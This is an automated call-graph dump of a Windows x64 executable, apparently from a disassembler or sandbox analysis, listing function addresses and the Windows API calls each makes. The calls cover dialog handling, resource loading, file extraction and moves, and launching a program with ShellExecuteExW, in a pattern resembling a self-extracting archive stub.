22854->22856 22855->22849 22857 7ff6ef6d2326 22856->22857 22918 7ff6ef6d0dac 16 API calls _handle_error 22857->22918 22859 7ff6ef6d2333 DeleteObject 22859->22848 22919 7ff6ef6c1adc 22860->22919 22862 7ff6ef6c1aba 22972 7ff6ef6c24d8 GetModuleHandleW FindResourceW 22862->22972 22864 7ff6ef6c1ac2 22864->22547 22866 7ff6ef6d6850 4 API calls 22865->22866 22867 7ff6ef6cf2a5 22866->22867 22867->22552 22871 7ff6ef6d177c _snwprintf 22868->22871 22869 7ff6ef6d183a 22870 7ff6ef6d6760 _handle_error 8 API calls 22869->22870 22872 7ff6ef6d184a 22870->22872 22871->22869 22873 7ff6ef6c6b64 CompareStringW 22871->22873 22872->22562 22874 7ff6ef6d17bf 22873->22874 22874->22869 22994 7ff6ef6d122c SetCurrentDirectoryW 22874->22994 22876 7ff6ef6d17cf 22877 7ff6ef6d1853 22876->22877 22878 7ff6ef6d1800 memcpy_s 22876->22878 22995 7ff6ef6d69a4 8 API calls 22877->22995 22880 7ff6ef6d1815 SHFileOperationW 22878->22880 22880->22869 22881 7ff6ef6d1858 22883 7ff6ef6d1435 22882->22883 22884 7ff6ef6d143e OleUninitialize 22883->22884 22885 7ff6ef726328 22884->22885 22886->22555 22887->22557 22889 7ff6ef6d6bd0 _snwprintf 22888->22889 22890 7ff6ef6c4f9c GetSystemDirectoryW 22889->22890 22891 7ff6ef6c4fc8 22890->22891 22892 7ff6ef6c4fcc 22890->22892 22895 7ff6ef6d6760 _handle_error 8 API calls 22891->22895 22893 7ff6ef6bf968 8 API calls 22892->22893 22894 7ff6ef6c4fe4 LoadLibraryExW 22893->22894 22894->22891 22896 7ff6ef6c4fff 22895->22896 22896->22791 22897->22775 22899 7ff6ef6dbb7b 22898->22899 22899->22814 22899->22899 22900->22785 22901->22831 22903 7ff6ef6d0d83 22902->22903 22904 7ff6ef6d0c37 SizeofResource 22902->22904 22903->22843 22904->22903 22905 7ff6ef6d0c51 LoadResource 22904->22905 22905->22903 22906 7ff6ef6d0c6a LockResource 22905->22906 22906->22903 22907 7ff6ef6d0c7f GlobalAlloc 22906->22907 22907->22903 22908 7ff6ef6d0ca0 GlobalLock 22907->22908 22909 7ff6ef6d0cb2 BuildCatchObjectHelperInternal 22908->22909 22910 7ff6ef6d0d7a GlobalFree 22908->22910 22911 7ff6ef6d0cc0 CreateStreamOnHGlobal 22909->22911 22910->22903 22912 7ff6ef6d0cde GdipAlloc 22911->22912 22913 7ff6ef6d0d71 GlobalUnlock 22911->22913 22914 7ff6ef6d0cf3 22912->22914 22913->22910 22914->22913 22915 7ff6ef6d0d42 GdipCreateHBITMAPFromBitmap 22914->22915 22916 7ff6ef6d0d5a 22914->22916 22915->22916 22916->22913 22917->22854 22918->22859 22920 7ff6ef6c1afe _snwprintf 22919->22920 22921 7ff6ef6c1b2c GetModuleFileNameW 22920->22921 22922 7ff6ef6c1b67 22920->22922 22923 7ff6ef6c1b4d 22921->22923 22924 7ff6ef6bc990 14 API calls 22922->22924 22923->22922 22931 7ff6ef6c1b9c 22924->22931 22925 7ff6ef6bc5ac 76 API calls 22927 7ff6ef6c242e 22925->22927 22926 7ff6ef6c1bd6 22974 7ff6ef6de8d0 22926->22974 22930 7ff6ef6d6760 _handle_error 8 API calls 22927->22930 22928 7ff6ef6c24a4 74 API calls 22928->22931 22933 7ff6ef6c243d 22930->22933 22931->22926 22931->22928 22962 7ff6ef6c1e0e 22931->22962 22933->22862 22934 7ff6ef6de8d0 31 API calls 22942 7ff6ef6c1c07 __vcrt_InitializeCriticalSectionEx 22934->22942 22935 7ff6ef6c1d3b 22936 7ff6ef6bceb0 78 API calls 22935->22936 22935->22962 22939 7ff6ef6c1d53 22936->22939 22937 7ff6ef6bcfc0 76 API calls 22937->22942 22938 7ff6ef6bccf0 79 API calls 22938->22942 22940 7ff6ef6bccf0 79 API calls 22939->22940 22939->22962 22943 7ff6ef6c1d7b 22940->22943 22941 7ff6ef6bceb0 78 API calls 22941->22942 22942->22935 22942->22937 22942->22938 22942->22941 22942->22962 22943->22962 22966 7ff6ef6c1d89 __vcrt_InitializeCriticalSectionEx 22943->22966 22982 7ff6ef6c66a4 MultiByteToWideChar 22943->22982 22945 7ff6ef6c22cb 22958 7ff6ef6c23a4 22945->22958 22988 7ff6ef6e1430 31 API calls 2 library calls 22945->22988 22947 7ff6ef6c2213 22947->22945 22985 7ff6ef6e1430 31 API calls 2 library calls 22947->22985 22950 7ff6ef6c2207 22950->22862 22951 7ff6ef6c2375 22990 7ff6ef6c2460 74 API calls 22951->22990 22952 7ff6ef6c23e1 22956 7ff6ef6de8d0 31 API calls 22952->22956 22953 7ff6ef6c2311 22989 7ff6ef6dfc34 31 API calls _invalid_parameter_noinfo_noreturn 22953->22989 22955 7ff6ef6c24a4 74 API calls 22955->22958 22957 7ff6ef6c2407 22956->22957 22959 7ff6ef6de8d0 31 API calls 22957->22959 22958->22952 22958->22955 22959->22962 22960 7ff6ef6c2231 22986 7ff6ef6dfc34 31 API calls _invalid_parameter_noinfo_noreturn 22960->22986 22962->22925 22963 7ff6ef6c229c 22987 7ff6ef6c2460 74 API calls 22963->22987 22964 7ff6ef6c6948 WideCharToMultiByte 22964->22966 22966->22945 22966->22947 22966->22950 22966->22962 22966->22964 22967 7ff6ef6c2458 22966->22967 22983 7ff6ef6c28f0 46 API calls 2 library calls 22966->22983 22984 7ff6ef6de6f4 31 API calls 2 library calls 22966->22984 22991 7ff6ef6d69a4 8 API calls 22967->22991 22970 7ff6ef6c245d 22973 7ff6ef6c2504 22972->22973 22973->22864 22975 7ff6ef6de8fd 22974->22975 22981 7ff6ef6de912 22975->22981 22992 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 22975->22992 22977 7ff6ef6de907 22993 7ff6ef6dbda0 31 API calls _invalid_parameter_noinfo 22977->22993 22979 7ff6ef6d6760 _handle_error 8 API calls 22980 7ff6ef6c1bf1 22979->22980 22980->22934 22981->22979 22982->22966 22983->22966 22984->22966 22985->22960 22986->22963 22987->22945 22988->22953 22989->22951 22990->22958 22991->22970 22992->22977 22993->22981 22994->22876 22995->22881 23035 7ff6ef6d2100 95 API calls 23081 7ff6ef6d3000 85 API calls 3 library calls 23083 7ff6ef6e5000 GetCommandLineA GetCommandLineW 23084 7ff6ef6b75f0 47 API calls 23036 7ff6ef6c14f0 8 API calls _handle_error 20848 7ff6ef6d23f0 20849 7ff6ef6d240f _snwprintf 20848->20849 21016 7ff6ef6b13d0 20849->21016 20851 7ff6ef6d2449 20852 7ff6ef6d2461 20851->20852 20853 7ff6ef6d2c39 20851->20853 20856 7ff6ef6d2476 20851->20856 20852->20856 20859 7ff6ef6d24dc 20852->20859 20860 7ff6ef6d246d 20852->20860 21144 7ff6ef6d47ec 20853->21144 20854 7ff6ef6d6760 _handle_error 8 API calls 20857 7ff6ef6d2fdf 20854->20857 20856->20854 20863 7ff6ef6d257d GetDlgItemTextW 20859->20863 20869 7ff6ef6d24f6 20859->20869 20864 7ff6ef6d2471 20860->20864 20865 7ff6ef6d24b8 20860->20865 20861 7ff6ef6d2c5b SendMessageW 20862 7ff6ef6d2c6c 20861->20862 20867 7ff6ef6d2c93 GetDlgItem SendMessageW 20862->20867 20868 7ff6ef6d2c78 SendDlgItemMessageW 20862->20868 20863->20865 20866 7ff6ef6d25cc 20863->20866 20864->20856 20874 7ff6ef6c2948 49 API calls 20864->20874 20865->20856 20871 7ff6ef6d25be EndDialog 20865->20871 20870 7ff6ef6d25e3 GetDlgItem 20866->20870 21014 7ff6ef6d25d5 20866->21014 21164 7ff6ef6d0b5c GetCurrentDirectoryW 20867->21164 20868->20867 20872 7ff6ef6c2948 49 API calls 20869->20872 20876 7ff6ef6d2601 SendMessageW SendMessageW 20870->20876 20877 7ff6ef6d262d SetFocus 20870->20877 20871->20856 20878 7ff6ef6d2514 SetDlgItemTextW 20872->20878 20875 7ff6ef6d2487 20874->20875 21191 7ff6ef6b12b4 9 API calls _handle_error 20875->21191 20876->20877 20881 7ff6ef6d263f 20877->20881 20892 7ff6ef6d264e 20877->20892 20882 7ff6ef6d2522 20878->20882 20879 7ff6ef6d2ccc GetDlgItem SetWindowTextW 21165 7ff6ef6d11a0 GetClassNameW 20879->21165 20886 7ff6ef6c2948 49 API calls 20881->20886 20882->20856 20890 7ff6ef6d253c GetMessageW 20882->20890 20884 7ff6ef6d2b7c 20888 7ff6ef6c2948 49 API calls 20884->20888 20885 7ff6ef6d249f 20885->20856 20895 7ff6ef6d2fc4 SetDlgItemTextW 20885->20895 20889 7ff6ef6d2649 20886->20889 20894 7ff6ef6d2b8d SetDlgItemTextW 20888->20894 21024 7ff6ef6d4568 20889->21024 20890->20856 20896 7ff6ef6d2556 IsDialogMessageW 20890->20896 20901 7ff6ef6c2948 49 API calls 20892->20901 20899 7ff6ef6c2948 49 API calls 20894->20899 20895->20856 20896->20882 20897 7ff6ef6d2567 TranslateMessage DispatchMessageW 20896->20897 20897->20882 20898 7ff6ef6d2d5c 20903 7ff6ef6d2d98 20898->20903 20906 7ff6ef6c2948 49 API calls 20898->20906 20934 7ff6ef6d2bbf 20899->20934 20905 7ff6ef6d2677 20901->20905 20902 7ff6ef6d353c 145 API calls 20902->20898 20908 7ff6ef6d2e7e 20903->20908 20913 7ff6ef6d353c 145 API calls 20903->20913 20910 7ff6ef6b552c swprintf 47 API calls 20905->20910 20911 7ff6ef6d2d6f SetDlgItemTextW 20906->20911 20907 7ff6ef6d26b2 20914 7ff6ef6d26d8 20907->20914 21036 7ff6ef6bd48c 20907->21036 20909 7ff6ef6d2f3e 20908->20909 20948 7ff6ef6d2f17 20908->20948 20955 7ff6ef6c2948 49 API calls 20908->20955 20915 7ff6ef6d2f52 20909->20915 20916 7ff6ef6d2f47 EnableWindow 20909->20916 20910->20889 20918 7ff6ef6c2948 49 API calls 20911->20918 20920 7ff6ef6d2db7 20913->20920 21055 7ff6ef6bd250 20914->21055 20924 7ff6ef6d2f79 20915->20924 21190 7ff6ef6b1384 GetDlgItem EnableWindow 20915->21190 20916->20915 20925 7ff6ef6d2d8a SetDlgItemTextW 20918->20925 20919 7ff6ef6d2c15 20922 7ff6ef6c2948 49 API calls 20919->20922 20930 7ff6ef6d2dcc 20920->20930 20940 7ff6ef6d2df8 20920->20940 20922->20856 20936 7ff6ef6d2fa6 20924->20936 20943 7ff6ef6d2f9e SendMessageW 20924->20943 20925->20903 20927 7ff6ef6d2702 21066 7ff6ef6d122c SetCurrentDirectoryW 20927->21066 20928 7ff6ef6d26f1 GetLastError 20928->20927 21199 7ff6ef6d0298 37 API calls _handle_error 20930->21199 20933 7ff6ef6d2f6a 20942 7ff6ef6b1384 GetDlgItem EnableWindow 20933->20942 20934->20919 20944 7ff6ef6c2948 49 API calls 20934->20944 20935 7ff6ef6d353c 145 API calls 20935->20908 20936->20856 20938 7ff6ef6c2948 49 API calls 20936->20938 20938->20885 20939 7ff6ef6d2dec 20939->20940 20953 7ff6ef6d353c 145 API calls 20940->20953 20966 7ff6ef6d2e60 20940->20966 20941 7ff6ef6d270e 20945 7ff6ef6d2724 20941->20945 20946 7ff6ef6d2715 GetLastError 20941->20946 20942->20924 20943->20936 20947 7ff6ef6d2bf8 20944->20947 20950 7ff6ef6d2794 20945->20950 20952 7ff6ef6d27a3 20945->20952 20954 7ff6ef6d2733 GetTickCount 20945->20954 20946->20945 20951 7ff6ef6b552c swprintf 47 API calls 20947->20951 21200 7ff6ef6d0298 37 API calls _handle_error 20948->21200 20950->20952 20965 7ff6ef6d2a24 20950->20965 20951->20919 20956 7ff6ef6d29bb 20952->20956 20958 7ff6ef6d29b2 20952->20958 20959 7ff6ef6d27b9 GetModuleFileNameW 20952->20959 20957 7ff6ef6d2e2f 20953->20957 20960 7ff6ef6b552c swprintf 47 API calls 20954->20960 20955->20908 20963 7ff6ef6c2948 49 API calls 20956->20963 20961 7ff6ef6d2e38 DialogBoxParamW 20957->20961 20957->20966 20958->20865 20958->20956 21193 7ff6ef6c3748 79 API calls 20959->21193 20964 7ff6ef6d274f 20960->20964 20961->20966 20968 7ff6ef6d29c5 20963->20968 21067 7ff6ef6bc688 20964->21067 20972 7ff6ef6c2948 49 API calls 20965->20972 20966->20935 20967 7ff6ef6d27e1 20969 7ff6ef6b552c swprintf 47 API calls 20967->20969 20970 7ff6ef6b552c swprintf 47 API calls 20968->20970 20973 7ff6ef6d280c CreateFileMappingW 20969->20973 20974 7ff6ef6d29e9 20970->20974 20976 7ff6ef6d2a52 SetDlgItemTextW 20972->20976 20977 7ff6ef6d288a GetCommandLineW 20973->20977 21010 7ff6ef6d2928 BuildCatchObjectHelperInternal 20973->21010 20983 7ff6ef6c2948 49 API calls 20974->20983 20980 7ff6ef6b13a8 20976->20980 20982 7ff6ef6d289c 20977->20982 20978 7ff6ef6d2788 21077 7ff6ef6bc5ac 20978->21077 20979 7ff6ef6d2779 GetLastError 20979->20978 20986 7ff6ef6d2a70 SetDlgItemTextW GetDlgItem 20980->20986 20981 7ff6ef6d292f ShellExecuteExW 20994 7ff6ef6d294d 20981->20994 21194 7ff6ef6d1ee0 SHGetMalloc 20982->21194 20987 7ff6ef6d2a01 20983->20987 20989 7ff6ef6d2ac1 20986->20989 20990 7ff6ef6d2a9b GetWindowLongPtrW SetWindowLongPtrW 20986->20990 20988 7ff6ef6d28c2 21195 7ff6ef6d1ee0 SHGetMalloc 20988->21195 21084 7ff6ef6d353c 20989->21084 20990->20989 20997 7ff6ef6d2962 WaitForInputIdle 20994->20997 20998 7ff6ef6d298b 20994->20998 20995 7ff6ef6d28d3 21196 7ff6ef6d1ee0 SHGetMalloc 20995->21196 20996 7ff6ef6d353c 145 API calls 21000 7ff6ef6d2aeb 20996->21000 21001 7ff6ef6d2974 20997->21001 20998->20958 21005 7ff6ef6d29a0 UnmapViewOfFile CloseHandle 20998->21005 21130 7ff6ef6d4c78 21000->21130 21001->20998 21004 7ff6ef6d2979 Sleep 21001->21004 21002 7ff6ef6d28e4 21197 7ff6ef6c37e8 79 API calls 21002->21197 21004->20998 21004->21001 21005->20958 21008 7ff6ef6d28fb MapViewOfFile 21008->21010 21009 7ff6ef6d353c 145 API calls 21013 7ff6ef6d2b1d 21009->21013 21010->20981 21011 7ff6ef6d2b4d 21198 7ff6ef6b1384 GetDlgItem EnableWindow 21011->21198 21013->21011 21015 7ff6ef6d353c 145 API calls 21013->21015 21014->20865 21014->20884 21015->21011 21017 7ff6ef6b13de 21016->21017 21018 7ff6ef6b1444 21016->21018 21017->21018 21201 7ff6ef6c2550 21017->21201 21018->20851 21020 7ff6ef6b1403 21020->21018 21021 7ff6ef6b1418 GetDlgItem 21020->21021 21021->21018 21022 7ff6ef6b142b 21021->21022 21022->21018 21023 7ff6ef6b1432 SetWindowTextW 21022->21023 21023->21018 21240 7ff6ef6d2090 PeekMessageW 21024->21240 21027 7ff6ef6d4607 SendMessageW SendMessageW 21029 7ff6ef6d464d 21027->21029 21030 7ff6ef6d4668 SendMessageW SendMessageW SendMessageW 21027->21030 21028 7ff6ef6d45b9 21033 7ff6ef6d45c5 ShowWindow SendMessageW SendMessageW 21028->21033 21029->21030 21031 7ff6ef6d46d2 SendMessageW 21030->21031 21032 7ff6ef6d46ad SendMessageW 21030->21032 21034 7ff6ef6d6760 _handle_error 8 API calls 21031->21034 21032->21031 21033->21027 21035 7ff6ef6d269d 21034->21035 21035->20907 21192 7ff6ef6d4d68 8 API calls 2 library calls 21035->21192 21245 7ff6ef6bd4a0 21036->21245 21039 7ff6ef6d15bc GetCurrentProcess OpenProcessToken 21040 7ff6ef6d1673 21039->21040 21041 7ff6ef6d1609 GetTokenInformation 21039->21041 21042 7ff6ef6d6760 _handle_error 8 API calls 21040->21042 21043 7ff6ef6d1643 21041->21043 21044 7ff6ef6d1634 GetLastError 21041->21044 21045 7ff6ef6d1754 21042->21045 21046 7ff6ef6d164c GetTokenInformation 21043->21046 21044->21040 21044->21043 21045->20914 21046->21040 21047 7ff6ef6d1680 CopySid 21046->21047 21048 7ff6ef6dbe38 21047->21048 21049 7ff6ef6d169a SetEntriesInAclW 21048->21049 21049->21040 21050 7ff6ef6d16ea InitializeSecurityDescriptor 21049->21050 21051 7ff6ef6d16fb SetSecurityDescriptorDacl 21050->21051 21052 7ff6ef6d1738 21050->21052 21051->21052 21053 7ff6ef6d1714 CreateDirectoryW 21051->21053 21052->21040 21054 7ff6ef6d1742 LocalFree 21052->21054 21053->21052 21054->21040 21060 7ff6ef6bd26e _snwprintf 21055->21060 21056 7ff6ef6d6760 _handle_error 8 API calls 21057 7ff6ef6bd360 21056->21057 21057->20927 21057->20928 21058 7ff6ef6bd31d 21059 7ff6ef6bd6ec 16 API calls 21058->21059 21061 7ff6ef6bd343 21058->21061 21059->21061 21060->21058 21060->21061 21062 7ff6ef6bd37d 21060->21062 21263 7ff6ef6bd6ec 21060->21263 21061->21056 21278 7ff6ef6d69a4 8 API calls 21062->21278 21065 7ff6ef6bd382 21066->20941 21068 7ff6ef6bc699 _snwprintf 21067->21068 21069 7ff6ef6bc6fa CreateFileW 21068->21069 21070 7ff6ef6bc6f4 21068->21070 21069->21070 21071 7ff6ef6bc773 21070->21071 21072 7ff6ef6bf630 9 API calls 21070->21072 21075 7ff6ef6d6760 _handle_error 8 API calls 21071->21075 21073 7ff6ef6bc741 21072->21073 21073->21071 21074 7ff6ef6bc745 CreateFileW 21073->21074 21074->21071 21076 7ff6ef6bc7a6 21075->21076 21076->20978 21076->20979 21078 7ff6ef6bc5c1 21077->21078 21079 7ff6ef6bc5d2 21077->21079 21078->21079 21080 7ff6ef6bc5d4 21078->21080 21081 7ff6ef6bc5cd 21078->21081 21079->20950 21300 7ff6ef6bc620 21080->21300 21289 7ff6ef6bc7b4 21081->21289 21085 7ff6ef6d2ad6 21084->21085 21086 7ff6ef6d3545 _snwprintf 21084->21086 21085->20996 21307 7ff6ef6d1dc4 21086->21307 21088 7ff6ef6d446b 21089 7ff6ef6d6760 _handle_error 8 API calls 21088->21089 21089->21085 21090 7ff6ef6c6b34 CompareStringW 21128 7ff6ef6d35be wcscat 21090->21128 21091 7ff6ef6d1dc4 9 API calls 21091->21128 21092 7ff6ef6d3d7a GetTempPathW 21092->21128 21095 7ff6ef6d3a99 SetWindowTextW 21095->21128 21096 7ff6ef6e0030 43 API calls 21096->21128 21098 7ff6ef6b552c swprintf 47 API calls 21098->21128 21100 7ff6ef6d1f5c 73 API calls 21100->21128 21101 7ff6ef6bd48c 11 API calls 21101->21128 21102 7ff6ef6d3de7 SetDlgItemTextW 21102->21128 21104 7ff6ef6d3c04 SetFileAttributesW 21106 7ff6ef6d3cc0 GetFileAttributesW 21104->21106 21126 7ff6ef6d39f7 memcpy_s 21104->21126 21108 7ff6ef6d3cce DeleteFileW 21106->21108 21106->21126 21108->21126 21110 7ff6ef6bf08c 11 API calls 21110->21128 21111 7ff6ef6b552c swprintf 47 API calls 21112 7ff6ef6d3d06 GetFileAttributesW 21111->21112 21118 7ff6ef6d3d17 MoveFileW 21112->21118 21112->21126 21113 7ff6ef6d4495 21350 7ff6ef6d69a4 8 API calls 21113->21350 21114 7ff6ef6d3ef8 EndDialog 21114->21128 21117 7ff6ef6d449a 21351 7ff6ef6d69a4 8 API calls 21117->21351 21122 7ff6ef6d3d2c MoveFileExW 21118->21122 21118->21126 21120 7ff6ef6d3a27 GetDlgItem SetWindowTextW SendMessageW 21120->21126 21122->21126 21123 7ff6ef6bd4a0 11 API calls 21123->21128 21124 7ff6ef6d44a0 21125 7ff6ef6d3a73 SendMessageW 21125->21128 21126->21104 21126->21111 21126->21125 21127 7ff6ef6d3c9f SHFileOperationW 21126->21127 21126->21128 21338 7ff6ef6d1bbc 98 API calls 2 library calls 21126->21338 21345 7ff6ef6bf434 47 API calls swprintf 21126->21345 21346 7ff6ef6bdca0 14 API calls 21126->21346 21127->21106 21128->21088 21128->21090 21128->21091 21128->21092 21128->21095 21128->21096 21128->21098 21128->21100 21128->21101 21128->21102 21128->21110 21128->21113 21128->21114 21128->21117 21128->21123 21128->21126 21129 7ff6ef6bd250 20 API calls 21128->21129 21313 7ff6ef6d4944 21128->21313 21339 7ff6ef6d0b5c GetCurrentDirectoryW 21128->21339 21340 7ff6ef6bf968 21128->21340 21344 7ff6ef6bdca0 14 API calls 21128->21344 21347 7ff6ef6bdc0c FindClose 21128->21347 21348 7ff6ef6d1ee0 SHGetMalloc 21128->21348 21349 7ff6ef6dfc34 31 API calls _invalid_parameter_noinfo_noreturn 21128->21349 21129->21128 21131 7ff6ef6d4c84 _snwprintf wcscpy 21130->21131 21361 7ff6ef6c4d3c 21131->21361 21133 7ff6ef6d4cc7 wcscpy 21365 7ff6ef6b7040 21133->21365 21135 7ff6ef6d4ce5 21369 7ff6ef6ba1a4 21135->21369 21141 7ff6ef6d4d49 21142 7ff6ef6d6760 _handle_error 8 API calls 21141->21142 21143 7ff6ef6d2b01 21142->21143 21143->21009 21145 7ff6ef6d4804 _snwprintf 21144->21145 22277 7ff6ef6d0abc 21145->22277 21148 7ff6ef6d4919 21151 7ff6ef6d6760 _handle_error 8 API calls 21148->21151 21149 7ff6ef6d4829 GetWindow 21150 7ff6ef6d4844 21149->21150 21150->21148 21153 7ff6ef6d4850 GetClassNameW 21150->21153 21155 7ff6ef6d48f8 GetWindow 21150->21155 21156 7ff6ef6d4879 GetWindowLongPtrW 21150->21156 21152 7ff6ef6d2c41 21151->21152 21152->20861 21152->20862 22282 7ff6ef6c6b34 CompareStringW 21153->22282 21155->21148 21155->21150 21156->21155 21157 7ff6ef6d488b SendMessageW 21156->21157 21157->21155 21158 7ff6ef6d48a7 GetObjectW 21157->21158 22283 7ff6ef6d0b24 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21158->22283 21160 7ff6ef6d48c3 22284 7ff6ef6d0aec 21160->22284 22288 7ff6ef6d0dac 16 API calls _handle_error 21160->22288 21163 7ff6ef6d48db SendMessageW DeleteObject 21163->21155 21164->20879 21166 7ff6ef6d11d3 21165->21166 21167 7ff6ef6d1200 21165->21167 22291 7ff6ef6c6b34 CompareStringW 21166->22291 21169 7ff6ef6d1213 21167->21169 21170 7ff6ef6d1205 SHAutoComplete 21167->21170 21172 7ff6ef6d6760 _handle_error 8 API calls 21169->21172 21170->21169 21171 7ff6ef6d11e4 21171->21167 21173 7ff6ef6d11e8 FindWindowExW 21171->21173 21174 7ff6ef6d1223 21172->21174 21173->21167 21175 7ff6ef6d1ab4 21174->21175 21176 7ff6ef6d1ac6 _snwprintf 21175->21176 21177 7ff6ef6b1500 49 API calls 21176->21177 21178 7ff6ef6d1af5 21177->21178 22292 7ff6ef6b2310 21178->22292 21181 7ff6ef6d1b1e 21184 7ff6ef6b1c60 147 API calls 21181->21184 21182 7ff6ef6d1b10 21183 7ff6ef6b16f8 87 API calls 21182->21183 21189 7ff6ef6d1b1a 21183->21189 21186 7ff6ef6d1b41 BuildCatchObjectHelperInternal 21184->21186 21185 7ff6ef6d6760 _handle_error 8 API calls 21187 7ff6ef6d1ba9 21185->21187 21188 7ff6ef6b16f8 87 API calls 21186->21188 21187->20898 21187->20902 21188->21189 21189->21185 21191->20885 21192->20907 21193->20967 21194->20988 21195->20995 21196->21002 21197->21008 21199->20939 21200->20909 21202 7ff6ef6b552c swprintf 47 API calls 21201->21202 21203 7ff6ef6c25ad 21202->21203 21204 7ff6ef6c6948 WideCharToMultiByte 21203->21204 21205 7ff6ef6c25bd 21204->21205 21206 7ff6ef6c262d 21205->21206 21221 7ff6ef6c1a20 31 API calls 21205->21221 21224 7ff6ef6c260e SetDlgItemTextW 21205->21224 21226 7ff6ef6c1748 21206->21226 21209 7ff6ef6c26a7 21211 7ff6ef6c26b0 GetWindowLongPtrW 21209->21211 21212 7ff6ef6c2766 21209->21212 21210 7ff6ef6c2796 GetSystemMetrics GetWindow 21213 7ff6ef6c28c5 21210->21213 21217 7ff6ef6c27c1 21210->21217 21215 7ff6ef7262d8 21211->21215 21231 7ff6ef6c17f4 21212->21231 21214 7ff6ef6d6760 _handle_error 8 API calls 21213->21214 21218 7ff6ef6c28d4 21214->21218 21219 7ff6ef6c274e GetWindowRect 21215->21219 21217->21213 21222 7ff6ef6c27e2 GetWindowRect 21217->21222 21225 7ff6ef6c28a4 GetWindow 21217->21225 21218->21020 21219->21212 21221->21205 21222->21217 21223 7ff6ef6c2789 SetWindowTextW 21223->21210 21224->21205 21225->21213 21225->21217 21227 7ff6ef6c17f4 48 API calls 21226->21227 21230 7ff6ef6c1787 21227->21230 21228 7ff6ef6d6760 _handle_error 8 API calls 21229 7ff6ef6c17e4 GetWindowRect GetClientRect 21228->21229 21229->21209 21229->21210 21230->21228 21232 7ff6ef6b552c swprintf 47 API calls 21231->21232 21233 7ff6ef6c1837 21232->21233 21234 7ff6ef6c6948 WideCharToMultiByte 21233->21234 21235 7ff6ef6c184f 21234->21235 21236 7ff6ef6c1a20 31 API calls 21235->21236 21237 7ff6ef6c1867 21236->21237 21238 7ff6ef6d6760 _handle_error 8 API calls 21237->21238 21239 7ff6ef6c1877 21238->21239 21239->21210 21239->21223 21241 7ff6ef6d20f4 GetDlgItem 21240->21241 21242 7ff6ef6d20b0 GetMessageW 21240->21242 21241->21027 21241->21028 21243 7ff6ef6d20de TranslateMessage DispatchMessageW 21242->21243 21244 7ff6ef6d20cf IsDialogMessageW 21242->21244 21243->21241 21244->21241 21244->21243 21255 7ff6ef6d6bd0 21245->21255 21248 7ff6ef6bd4d5 21257 7ff6ef6bf630 21248->21257 21249 7ff6ef6bd4f9 21250 7ff6ef6d6760 _handle_error 8 API calls 21249->21250 21252 7ff6ef6bd495 21250->21252 21252->20914 21252->21039 21254 7ff6ef6bd4ec GetFileAttributesW 21254->21249 21256 7ff6ef6bd4b0 GetFileAttributesW 21255->21256 21256->21248 21256->21249 21260 7ff6ef6bf641 _snwprintf 21257->21260 21258 7ff6ef6d6760 _handle_error 8 API calls 21259 7ff6ef6bd4e8 21258->21259 21259->21249 21259->21254 21261 7ff6ef6bf718 GetCurrentDirectoryW 21260->21261 21262 7ff6ef6bf68c 21260->21262 21261->21262 21262->21258 21264 7ff6ef6bd6fe _snwprintf 21263->21264 21265 7ff6ef6bd73e 21264->21265 21266 7ff6ef6bd72f CreateDirectoryW 21264->21266 21267 7ff6ef6bd4a0 11 API calls 21265->21267 21266->21265 21268 7ff6ef6bd773 21266->21268 21269 7ff6ef6bd746 21267->21269 21273 7ff6ef6bd782 21268->21273 21279 7ff6ef6bdb64 21268->21279 21270 7ff6ef6bd786 GetLastError 21269->21270 21271 7ff6ef6bf630 9 API calls 21269->21271 21270->21273 21274 7ff6ef6bd75e 21271->21274 21275 7ff6ef6d6760 _handle_error 8 API calls 21273->21275 21274->21270 21276 7ff6ef6bd762 CreateDirectoryW 21274->21276 21277 7ff6ef6bd7b1 21275->21277 21276->21268 21276->21270 21277->21060 21278->21065 21280 7ff6ef6d6bd0 _snwprintf 21279->21280 21281 7ff6ef6bdb79 SetFileAttributesW 21280->21281 21282 7ff6ef6bdba2 21281->21282 21283 7ff6ef6bdbcb 21281->21283 21284 7ff6ef6bf630 9 API calls 21282->21284 21285 7ff6ef6d6760 _handle_error 8 API calls 21283->21285 21286 7ff6ef6bdbb5 21284->21286 21287 7ff6ef6bdbdd 21285->21287 21286->21283 21288 7ff6ef6bdbb9 SetFileAttributesW 21286->21288 21287->21273 21288->21283 21290 7ff6ef6bc7eb 21289->21290 21291 7ff6ef6bc7c3 _snwprintf 21289->21291 21290->21079 21291->21290 21292 7ff6ef6bd418 DeleteFileW 21291->21292 21293 7ff6ef6bd43f 21292->21293 21294 7ff6ef6bd466 21292->21294 21295 7ff6ef6bf630 9 API calls 21293->21295 21296 7ff6ef6d6760 _handle_error 8 API calls 21294->21296 21297 7ff6ef6bd452 21295->21297 21298 7ff6ef6bd478 21296->21298 21297->21294 21299 7ff6ef6bd456 DeleteFileW 21297->21299 21298->21079 21299->21294 21301 7ff6ef6bc654 21300->21301 21302 7ff6ef6bc63c 21300->21302 21303 7ff6ef6bc678 21301->21303 21306 7ff6ef6b89b4 72 API calls 21301->21306 21302->21301 21304 7ff6ef6bc648 CloseHandle 21302->21304 21303->21079 21304->21301 21306->21303 21310 7ff6ef6d1dd5 _snwprintf 21307->21310 21308 7ff6ef6d6760 _handle_error 8 API calls 21309 7ff6ef6d1ed2 21308->21309 21309->21128 21311 7ff6ef6d1e93 ExpandEnvironmentStringsW 21310->21311 21312 7ff6ef6d1eb7 21310->21312 21311->21312 21312->21308 21317 7ff6ef6d4962 memcpy_s _snwprintf 21313->21317 21314 7ff6ef6d4bd2 21315 7ff6ef6d6760 _handle_error 8 API calls 21314->21315 21316 7ff6ef6d4be1 21315->21316 21316->21128 21317->21314 21318 7ff6ef6d4a8e 21317->21318 21358 7ff6ef6c6b34 CompareStringW 21317->21358 21320 7ff6ef6bd48c 11 API calls 21318->21320 21321 7ff6ef6d4aac 21320->21321 21322 7ff6ef6d4acd ShellExecuteExW 21321->21322 21359 7ff6ef6bf08c 11 API calls 2 library calls 21321->21359 21322->21314 21324 7ff6ef6d4ae0 21322->21324 21326 7ff6ef6d4aff IsWindowVisible 21324->21326 21327 7ff6ef6d4b1a WaitForInputIdle 21324->21327 21328 7ff6ef6d4b6f CloseHandle 21324->21328 21325 7ff6ef6d4ac4 21325->21322 21326->21327 21329 7ff6ef6d4b0c ShowWindow 21326->21329 21352 7ff6ef6d4ef4 21327->21352 21331 7ff6ef6d4b7e 21328->21331 21332 7ff6ef6d4b8d 21328->21332 21329->21327 21360 7ff6ef6c6b34 CompareStringW 21331->21360 21332->21314 21336 7ff6ef6d4bc4 ShowWindow 21332->21336 21333 7ff6ef6d4b32 